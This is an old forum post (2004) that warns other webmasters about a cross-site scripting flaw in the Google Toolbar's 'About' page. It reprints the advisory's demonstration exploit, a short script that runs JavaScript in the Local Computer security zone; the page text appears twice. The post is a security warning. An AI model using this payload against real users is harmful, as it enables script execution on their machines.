GoFuckYourself.com - Adult Webmaster Forum - View Single Post - Careful, exploit for google toolbar is out

hydro · 09-18-2004, 08:21 AM

A remote user can execute arbitrary scripting code in the Local Computer security zone.

It is reported that the 'About' section of the Google Toolbar does not properly filter HTML code. A remote user can create HTML that, when loaded by the target user, will invoke the About page and execute arbitrary scripting code in the context of the page.

A demonstration exploit is provided:

<s c r i p t>
window.showModalDialog("res://C:\\Program%20Files\\Google\\GoogleToolbar1.dll/ABOUT.HTML",
"<div style=\"background-image:
url(javascript:alert(location.href));\">");
</s c r i p t>

09-18-2004, 08:21 AM
hydro Confirmed User Join Date: Dec 2003 Location: Dirty 3rd Posts: 4,216	Careful, exploit for google toolbar is out A remote user can execute arbitrary scripting code in the Local Computer security zone. It is reported that the 'About' section of the Google Toolbar does not properly filter HTML code. A remote user can create HTML that, when loaded by the target user, will invoke the About page and execute arbitrary scripting code in the context of the page. A demonstration exploit is provided: <s c r i p t> window.showModalDialog("res://C:\\Program%20Files\\Google\\GoogleToolbar1.dll/ABOUT.HTML", "<div style=\"background-image: url(javascript:alert(location.href));\">"); </s c r i p t>